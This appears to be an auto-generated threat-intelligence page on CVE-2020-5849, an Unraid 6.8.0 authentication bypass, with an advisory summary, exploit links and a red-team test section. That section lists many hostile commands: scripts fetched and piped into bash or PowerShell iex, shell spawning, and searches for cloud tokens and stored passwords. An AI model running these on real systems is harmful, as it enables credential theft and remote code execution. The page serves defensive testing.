CVE-2020-5849
Overview
This vulnerability is an authentication bypass affecting Unraid version 6.8.0. The root cause lies in improper validation of authentication tokens or session management mechanisms within the web interface, allowing unauthorized access to restricted functionalities. The affected component is the Unraid management web service, which fails to enforce proper authentication checks on certain API endpoints.
Vulnerability Description
Unraid 6.8.0 allows authentication bypass.
Impact
An attacker can gain full administrative access to the Unraid server without any prior authentication or user interaction. This access enables execution of arbitrary commands as root, potentially leading to complete system compromise, data exposure, and disruption of storage services. The vulnerability facilitates unauthorized control over the server infrastructure, posing a critical threat to data integrity and availability in environments relying on Unraid 6.8.0.
Solution
Users should upgrade Unraid to a version later than 6.8.0 where the vendor has addressed this authentication bypass issue. Detailed patch instructions and advisories are available at the Unraid forums and Sysdream security lab announcements, including https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/. No official workaround is documented; applying the vendor-supplied update is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Unraid version 6.8.0 is characterized by an authentication bypass, which allows unauthorized users to gain access to sensitive areas of the system without proper credentials. This flaw arises from improper validation of user authentication tokens, enabling attackers to exploit the system's authentication mechanisms. The underlying issue lies in the way the application handles session management and user verification, which can be manipulated to grant access to restricted functionalities. As a result, an attacker can potentially execute commands or access data that should be protected, leading to severe security implications.
Attack vectors for this vulnerability are varied and can be executed with relative ease. An attacker could leverage social engineering techniques to trick an authorized user into revealing their session token, or they could exploit the flaw directly by crafting malicious requests that bypass authentication checks. For instance, if an attacker can intercept network traffic or manipulate requests to the server, they could gain unauthorized access to the Unraid interface. Additionally, if the system is exposed to the internet without adequate security measures, the risk of exploitation increases significantly, as attackers could automate these methods to compromise multiple systems.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on Unraid for data storage and management. Successful exploitation could lead to unauthorized access to sensitive data, including personal information, intellectual property, or proprietary business information. This breach could result in data loss, financial repercussions, and reputational damage. Furthermore, organizations may face regulatory penalties if they fail to protect sensitive data adequately, especially in industries governed by strict compliance standards. The risk extends beyond immediate financial loss; it can also lead to long-term trust issues with customers and partners.
To detect and mitigate the risks associated with this authentication bypass vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Unraid system to the latest version is crucial, as patches often address known vulnerabilities. Additionally, employing network security measures such as firewalls, intrusion detection systems, and VPNs can help protect against unauthorized access attempts. Monitoring system logs for unusual access patterns or failed login attempts can also aid in early detection of potential exploitation. Furthermore, organizations should enforce strong authentication practices, such as multi-factor authentication, to enhance security and reduce the likelihood of unauthorized access.
In conclusion, the authentication bypass vulnerability in Unraid 6.8.0 poses a significant threat to the integrity and security of systems utilizing this platform. The ease of exploitation and the potential for severe consequences necessitate immediate attention from organizations using this software. By adopting robust detection and mitigation strategies, businesses can better safeguard their systems against unauthorized access and protect their sensitive information from malicious actors. As the cybersecurity landscape continues to evolve, proactive measures and continuous monitoring will be essential in defending against such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-5849, corresponding with the emergence of new proof-of-concept exploits leveraging the authentication bypass and subsequent arbitrary code execution in Unraid 6.8.0. Although the EPSS score shows a slight decline, our telemetry indicates increased adversary interest and activity, underscoring a growing operationalization of this vulnerability. This shift elevates the threat landscape as attackers are more actively exploiting the flaw, increasing the risk of unauthorized administrative access and full system compromise. Consequently, the risk level associated with CVE-2020-5849 should be considered heightened, reflecting its expanding exploitation footprint and the availability of sophisticated exploitation tools in the wild.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Unraid | Unraid | 6.8.0 |
cpe:2.3:o:unraid:unraid:6.8.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Unraid 6.8.0 Auth Bypass PHP Code Execution
exploits/linux/http/unraid_auth_bypass_exec
|
Nicolas CHATELAIN <[email protected]> | Unknown | php | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit) | Metasploit | remote | linux | - | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-5849 |
| sysdream.com |
GitHub CVE
x_refsource_MISC
|
https://sysdream.com/news/lab/ |
| forums.unraid.net |
GitHub CVE
x_refsource_MISC
|
https://forums.unraid.net/forum/7-announcements/ |
| sysdream.com |
GitHub CVE
x_refsource_MISC
|
https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/157275/Unraid-6.8.0-Authentication-Bypass-Arbitrary-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5849 |